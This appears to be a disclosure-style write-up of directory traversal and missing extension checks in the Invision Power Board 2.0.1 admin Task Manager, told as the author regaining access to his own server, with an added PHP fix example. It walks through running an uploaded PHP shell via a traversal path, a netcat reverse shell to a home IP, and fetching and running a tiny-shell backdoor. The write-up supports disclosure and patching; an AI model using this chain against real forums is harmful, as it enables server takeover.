
Invision Power Board Privilege Escalation (2.0.1 + more)



---------
Title: Invision Power Board
---------
Version: 2.0.1 (maybe more)
---------
Severity: Low
---------
Info: Invision Board Admin able to execute arbitrary code as uid of
the apache process.
----------
Bug(s):

#1 Fails to jail the location of Task Manager scripts and allows
directory traversal.

#2 The 'Task PHP File To Run' field does not check for a '.php' extension and
allows the user to run uploaded files with any extension, including
Invision's '.ipb' upload extension.
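One way to close both bugs on the Task Manager's 'Task PHP File To Run' field, as an added illustrative example (not Invision's own code): the weak version reproduces the behaviour described in Bug #1 and Bug #2, and the hardened version restricts the field to a bare '.php' filename and confirms the resolved path stays inside the task directory. The './sources/tasks/' directory comes from the writeup; the function names and the `run_task` wrapper are assumptions.

```php
<?php
// Added example, not Invision Power Board's own code. Assumes tasks live under
// './sources/tasks/' (from the writeup) and $taskFile is the admin-supplied field.

// Weak version (the behaviour behind Bug #1 and Bug #2): the field is glued onto
// the directory as-is, so '../../uploads/post-5-1130919619.ipb' both escapes the
// directory and runs a file that is not a .php script.
function task_path_weak(string $taskDir, string $taskFile): string
{
    return rtrim($taskDir, '/') . '/' . $taskFile;
}

// Hardened version: allowlist a single bare filename ending in .php, then
// canonicalise and require the resolved file to sit inside the task directory.
function task_path_hardened(string $taskDir, string $taskFile): ?string
{
    // One path component only: no slashes, no '..', no alternate extensions.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.php\z/', $taskFile)) {
        return null;
    }
    $base = realpath($taskDir);
    $full = realpath($taskDir . DIRECTORY_SEPARATOR . $taskFile);
    if ($base === false || $full === false) {
        return null;                       // directory or file does not exist
    }
    // Containment check also covers a symlink inside the task directory that
    // points somewhere outside it.
    if (strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $full;
}

// Hypothetical wrapper: refuse and log instead of including anything unvalidated.
function run_task(string $taskDir, string $taskFile): bool
{
    $path = task_path_hardened($taskDir, $taskFile);
    if ($path === null) {
        error_log("Task Manager: rejected task file '" . $taskFile . "'");
        return false;
    }
    require $path;
    return true;
}

// Demonstration with the two inputs from the writeup (assumed directory path).
// Both fail the allowlist regex, so they are rejected before any file is touched.
$taskDir = __DIR__ . '/sources/tasks';
var_dump(task_path_hardened($taskDir, '../../index.php'));
var_dump(task_path_hardened($taskDir, '../../uploads/post-5-1130919619.ipb'));
```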




-:Hack Your Own Server Through Invision Power Board Admin Console:-
by: Antimatt3r
email: antimatter@xxxxxxxxx
####################################################################


Problem
---------
Due to basically a lack of sleep and panic over seeing 20 sshd processes
when doing a process listing, without thinking I did a 'killall -9
sshd' as root. I was immediately disconnected and said 'oh sh17'.
I basically just severed my only ability to log in to the box and had
no means of rebooting it.
I run a number of services but keep my system patched. Even the
Invision Board has always been patched.

Background
---------
Colocated server 1200 miles away.
No one has access to it for long periods of time, basically complete
remote administration.
I'm running a couple of forums, one of which uses version 2.0.1 of
Invision Power Board.

Research\Exploit
---------
After long thoughts about what I was going to do to be able to get a term
on the box, and many people telling me "you're screwed", I figured I'd
start at the weakest point on my box, which is the phpbb board (sorry
phpbb but we all know it's true) used for another site. No obvious
holes\misconfigurations. I then logged into the Invision Admin Console
because it has a lot of features I've never even looked into and I
wasn't sure what I could do. Now here is where it starts getting
interesting.

I was looking for something that would let me run or add my own php
code so I could basically have a 'php shell'. I stumbled across 'Task
Manager', where it had some tasks it ran on a chronological basis or to
run a task on demand. It also has the ability to add your own task.
The tasks are .php files. The problem was that I still had to manually
add the php file to the box in a hard coded './sources/tasks/'
directory. You then have a field to add the filename for this path. I
started with the basic '../../index.php' (this would be the path to
the main index.php so I could be sure it was there) to see if this
directory was jailed correctly. It wasn't (Bug #1)! But all I got from
that was some errors when it tried to run the 'index.php' as a task
file. So I still needed a way to get the file on there. I remembered
that you could add attachments to the forum and they were stored in
the upload directory. The other thing I remembered though was that the
filenames were scrambled (or changed from what they really were to
some kind of post information and a timestamp; for lack of a better
word I'll call it a hash from now on) in this directory, so I would have
no way of knowing what to point the task to.

Before I even went down this path I tried adding '../../uploads/' to
the task file name. Not that I thought putting a directory in would do
anything, but just to see if it checked for a '.php' extension on the
task file. It didn't (Bug #2)! It basically dumped out errors but that
was all I needed to see to know I should be able to pass anything and
have the php code executed. The next thing I looked at was how you
accessed attachments, hoping maybe I could find the hash name of the
file. The link to an attachment looked like
http://www.website.com/forum/index.php?act=Attach&type=post&id=27
So there was nothing there to go on, but it made me think the
database must have some way of associating id=27 with the hash name.

So I then did a full .sql dump, which you can do through the web
interface. Trying to determine what 27 meant in 10MB of raw sql was
not working. I then went back to the Admin Interface and looked at the
'SQL Toolbox'. From here you could click any of the tables and a
command would be presented so you could run it and see everything in
the table. So there was a table called ibf_attachments and I ran the sql
cmd 'select * from ibf_attachments'. This gave me the info I needed
for what the real uploaded file name was being mapped to in the
uploads directory. (I noticed what looked like a keyword combined with
a timestamp and given a .ipb extension). So I uploaded my 'php shell'
file by posting a topic in the forum and adding it as an attachment,
found what the name of the file was being stored on the local disk as
from the database, and then added this to the path of my task file to be
executed so it looked something like
'../../uploads/post-5-1130919619.ipb'. Then I just clicked the task run now link in
the Admin CP that would execute the script.

This kind of worked and I was presented with a place to enter commands
that should run, but when I would post one of the commands I would get
kicked back to the login screen for the admin control panel. I didn't
really look into why; I'm assuming I was supposed to post some
session key, but I didn't want to go through all that since I figured I
could just as easily run some commands with the system() php command as
the Apache user. So I then wrote a very simple php script to connect
back to my home computer over a netcat session ('netcat myhouseip
myport -e /bin/bash'). I did the same trick of uploading the php code
as an attachment, finding the locally stored name, and editing my task
to the new path. I then set up my box to listen for the connection
(netcat -l -p <myport>). I once again clicked the 'Run Task Now' link.
This time the page just held in the loading state. This was because it
had executed my netcat code and was waiting for the pipe to be closed.
Once connected I realized I couldn't su to the root user or any other
user because the input for the password was the stdin on the remote box. I
tried to start ssh but it complained about missing keys. I needed a
shell that had a terminal attached. I remembered from a wargame before
using tiny shell and being able to do more commands. A quick search on
Google confirmed this would be what I needed.

From my netcat session I was able to do a wget to grab the tiny shell
0.6 src (wget http://www.cr0.net:8040/code/network/tsh-0.6.tgz). I had
one port above 1024 that had been left open in iptables for a web
interface to a game server that was no longer running (long live
UT99). I had to edit the 'tsh.h' file by using echos and redirection
since I could not use vi from my netcat term (I could have also used
the Connect Back option in Tiny Shell if I didn't have an open port).
From there I just had to build the application (make linux) and
execute the daemon (./tshd). I built it with the same option and ran
the client (./tsh serverip). I was connected and given the shell I
needed. I immediately su'd and restarted the ssh daemon.


Conclusion
---------
I would have to say this is a very low severity for most people
because you have to be an admin on an Invision Board to be able to do
this in the first place. But if the Invision Board is being provided
as a service (like the one provided at http://www.invisionboard.com)
then the admin can now get elevated privileges and a shell as the uid
of the apache process, so in this case it is more serious. Or this can
also be very useful if you do something stupid like killing sshd where
rebooting is not an option.